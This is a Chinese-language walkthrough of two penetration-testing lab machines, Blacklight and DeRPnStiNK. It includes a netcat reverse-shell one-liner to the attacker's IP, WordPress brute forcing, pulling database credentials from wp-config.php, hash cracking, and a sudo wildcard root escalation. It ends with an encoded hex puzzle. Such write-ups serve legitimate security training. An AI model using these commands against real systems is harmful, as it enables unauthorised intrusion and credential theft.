渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

2019-08-07 15:01:05 浏览数 (1)

前言

挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了….

靶机安装/下载

Blacklight靶机下载:

https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载:

https://pan.baidu.com/s/1ayCZ17PHxFe71vbldjGW2w

Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31

实战

1.Blacklight靶机

老规矩nmap开路,个人习惯直接全端口…

通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…. 我们还是继续先用80端口作为突破口

界面还是比较简单的,我们使用目录爆破工具跑一下看看,小伙伴们可以自选,小弟还是继续使用kali上自带的 dirb (注:前面的文章中经常有小伙伴们说我的XX目录这么爆破不出来等等,个人觉得大家不应该局限于特定一款工具,可以多试几款多收集一些大的字典包

简单的探测后可以看到 有个 “robots.txt” 根据经验有这个目录大部分是有价值得…访问看

得到 flag1.txt blacklight.dict 2个目

可以看到我们已经拿到了第一个flag:“fc4c7223964a26b152823d14f129687207e7fe15”,并告诉我们9072的秘密在首页?(“家?”),另外一个相信小伙伴们也看的出肯定是一个密码字典等等子类的

根据提示小弟在这里被卡了好几天…. 收集了该作者的github、blog首页、他写的一些项目啊一些跟MSF官方交流的信息啊等等等等,一个一个去搜索查看关于“9072”的线索结果都一无所获…本来都有点想放弃的,但是看他写的说该靶机说初学者级别,感觉脸上的巴掌印有点红…. 最后操起本着都试试的心态,操起“banner-plus”插件探测一下看看,结果有发现

发现一个 “.help” ? 那就直接命令 “telnet 172.16.24.92 9072”

我们跟着提示 输入 “.help”

第一个为读取hash,我们试着用刚刚那个字典破解一下…(其实可以完全不用

我们其实只需要用到 “.exec” 就行了 命令:.exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.16.24.31 5555 >/tmp/f (外面要加一个”“”

注:这里只有2次的命令输入机会,超过了需要重启靶机

可以看到我们已经拿到了shell。。 且权限为root

该靶机完!是不是很简单….

2.DeRPnStiNK靶机

老规矩!nmap开路

可以看到开放了多个端口服务,我们还是用80端口作为我们的突破口,使用命令: curl http://172.16.24.69 拿到第一个flag

(注:该flag通过访问网页查看源码是看不到的哦)

下一步还是跟真实渗透环境中一样跑一下目录

可以看到找到了比较多的目录,如“/php”、“/weblog/”等等 我们访问 http://172.16.24.69/webnotes/info.txt

让我们添加上本地DNS转换,结合上访问“/weblog”目录在浏览器左下角一直在请求连接“derpnstink.local” 如图:

那下一步肯定就在 /etc/hosts 里写入地址,如图

我们继续访问

可以看到页面已经能正常访问了,通过前面的目录扫描已经知道它使用的WP搭建的网站,下面我们直接使用wpscan来扫描该web,顺便加载上自己的字典看能不能爆破出账号密码,如图:

过扫描结果可以看到,还是挺幸运的 成功扫描出几个漏洞和爆破出账号密码,都为”admin”,下一步肯定是登陆拿shell,我相信这肯定难不倒聪明的各位,小弟这里使用MSF来帮忙完成(这个模块小弟前面的文章有使用过来,这里就不多说了..),如图:

为了文章演示方便,小弟上个了webshell…

下面我们查看 “wp-config.php” 拿mysql密码

得到账号:”root”,密码:”mysql” 我们在跑目录的时候已经知道 “/php”目录下面就是 phpmyadmin,为了演示方便,小弟使用phpmyadmin来登陆操作 http://derpnstink.local/php/phpmyadmin/index.php

登陆后在 “wp-posts”拿到flag2

lag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

在 “wp-user” 拿到hash密文:

“$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41”

可以先辨别一些hash密文的类型

下一步肯定是猜解这个密文,小伙伴们可以使用“hashcat”,命令为:

hashcat -a 0 -m 400 xx.hash mima.txt 因小弟电脑未安装GPU补丁程序,故小弟使用john来完成这个工作 得到密码为:wedgie57 账号为:stinky

我们使用得到的账号密码登陆FTP

功登陆并得到了2个文件,一个如图为与一个“mrderp”用户对话记录 另一个为 ssh 的登陆密钥,如图: ftp://stinky@172.16.24.69/files/ssh/ssh/ssh/ssh/ssh/ssh/key.txt

我们把密钥复制到本地,然后去登陆ssh,如图:

经成功登陆!(注:此处的key.txt 必须要给足权限,否则无法登陆)

下一步拿flag flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb) 我们继续翻目录,在/Documents 下发现一个 “derpissues.pcap”握手包,

我们down下来分析看看,命令: scp -i key.txt stinky@172.16.24.69:/home/stinky/Documents/derpissues.pcap /tmp/derp.pcap

我们载入wireshark分析,拿到“mrderp”密码,如图:

密码为:“derpderpderpderpderpderpderp”

下面我们切换账号登陆试试

可以看到已经切换成功并在桌面发现一个“helpdesk.log”文件

下面我们试着切换看看能不能成功,输入命令“sudo -l”

出现一个关键词:(ALL) /home/mrderp/binaries/derpy*

本来这个目录下面是没有“/binaries/”目录的,我们可以创建这个目录和前面包含“derpy”的文件,如图:

并在文件内写入 “/bin/bash” 保存。最后一步就是直接拿root了, 命令为: sudo ./derpy.sh 如图:

成功拿下root权限和flag4!!

总结

没什么好说的,这是小弟的联系方式:

代码语言:javascript复制
56477853576b31736345565a656b4a50596c56726431647
3556c4a4e617a5656566c524f55464a47576d395561314a
755456557863565a55546b39686132743556316477616d51
774e55685856455a50595773784d315273556c704e617a46
56566c525754315a476133705556564a57546b5531635656
55516b39575230313356477853576b31564d584658625842
505a577446656c5178556c5a4e617a56305646524b55464a
47634842556258424b54555531635656746145396c617a42
3456466877595746724e545a5256455a61566b5a4b636c527
2556c704e565456565758705354315a4863336c5856334258
5955553153464e55526b3968624656355647786b526b30774
d545a5756453550596c5577656c5256556c5a4f5254565656
46524354315a47536d395562464a475456553163566474634
53957526d743556465a53566b35564e56565856454a51566b
644e4d465273556d704e624842565656524b54315a4854586
c55563342535457733157464a55546b3553526c5635564730
78536b31564e58465857476850566b644e643152746346646
8525456465758704754325673634846556247524754577873
4e6c5a596245356c6130593256477853566b35464e5656585
748424f5957314e4d4652756345354e617a46565632317754
3149775658685562464a615a56553152566b7a63464257526
c707656477853576b31464e56565762576850595774566546
5272556c5a4e4d445532576e704b546c5a47566a5655574842
475454417852565655566b39574d46563356473177576b3546
4e584661656b7050566b5a77635652735a455a4e52546c4656
6c524b54314a48545870554d464a615a55553156566459634
53557526c707656473577546b31564e545a5862577850566a4
25665465177556c706c56545646566c5247576c5a475654425
562464a795456553152565655536b396c625531345647317754
6d56464e545a5256455a51556b5a7265465272556c704e526e42
565632317354315a4762445a5556564a4f54565531525670365
26b39575254453156473577546d56724d56565756455a4f5a577
47264316457556c5a4f56545678556c524354314a47566a56556
2464a715457737863565a55556b396862574e3456477453566b3
1564e58525356454a50595778574e56527463465a4e525456785
63152435432567261336858566c4a535454413163567036516d4
657526b707956473078566b31724f55565762576850566b5a726
5566457556c4a6c5654563056315247546c5a464d54525562464
a795454413552565a55526b39695654423556477453566b30774
e56565856454a50566b5a6162315273556d354e5654567856323
130543256724d545a55566c4a575457733164465255526b39575
230307856473177566b31464f55565856454a505957316a65465
2586345356b4d4455325556524355465a47576d395561314a575
4565578635656744d553957526d773256465a53556b35564e486
c5356455a50566b5a77633152725a455a4e56545532565731305
4324a575658645862464a4f545555315657457a6345356862553
43256473577626b31564e545a5756457050556a4256656c52596
3465a4e4d4456305646524b54314a47566a5a5562464a6154555
53163565a74614539575257743456473177595745774d545a535
748424f556b5a56655652596345704e526e42565758704354315
a4761336c58563342615455553156566455536b3568624842785
647746b526b30774d56565756455a50596c5a46656c5177556d7
04e4d44565656566877546c5a47576d3955626e424f545655315
6566474624539574d46563356327853576d56564e55565856455
a505957737764315273556c704e5654553257544e77546d56735
6586855625842575454413153464a55516b39686247773256477
453566b31724f555657564570505957747265465177556c4a6c5
6545678576e704754324673634846556258425354555a7363565
a596245356c6131563356327853616b31564e58465456454a505
957785665565273556d704e617a46785656524b54315a4762445
a5561314a575457733152566b7a6345355752544233564778535
76d56724d58465757477850556b646a654652586347466856545
659556c5247546c4a4756586c556254464b5a57733156565a555
16b3957526b563456473577616d56724d545a5256454a68556b5
a56655652735a455a4e4d444678566d316f54314a47525864555
63342575457733153465655526b39686246707656473577636b3
1564e55565756457050566b5a7265565257556c5a4e525445325
56c5247576c5a48546a5a5562464a71545778734e6c647463453
9575230313556465a53546d56464e56685356457051556b5a566
5565273556c5a4e566d78565631686f543246724d486c5857484
261545555314e6c5a55526b3953526e427756466877636b31564
d545a5857477850556b5a56656c5256556c706c5254565657587
04754314a47526a565562464a715456553556565a55536b39575
257743656466877566d56724e58525556455a5059577856656c5
2746345704e624842465631525354315a485933685562464a685
95441784e6c4a55536d46686245707956466877526b315762465
65656455a50566b567265566472556c4a4e617a5656564652435
9564a4756586c55626e424354565a7356565a55546b396956577
43456315a53566b30774e58465356455a5059577872643152725
56c704e565445325632317754315a4661336855626e42575a565
53164465255546b3553526c56365647786b526b31564e5656575
6455a4f5a57745665565272556c4a4e617a5649556c524f546c5
a47565870556254464f54555a7756566455556b3968624656355
6316877563246464e56565756455a5059577856656c525963455
a6c617a5646566c524f54324a5662445a55566c4a53545441315
6566c36536c70686247743356477853576b31724d56565557484
250566b56726546527563465a4f5654563056465247576c5a476
244525562584257545778734e6c64746245396c6255313456473
177595746564e545a5656455a5059577856655652744d55354e4
d4446465656524b54315a4756586855625842575a5655314e6c4
e55526b3553526c59305646524b556d567363454a5156444139

你能破解了出来了吗?坏笑!! 祝大家生活愉快!

文章来自:安全客

作者:d3ckx1

0 人点赞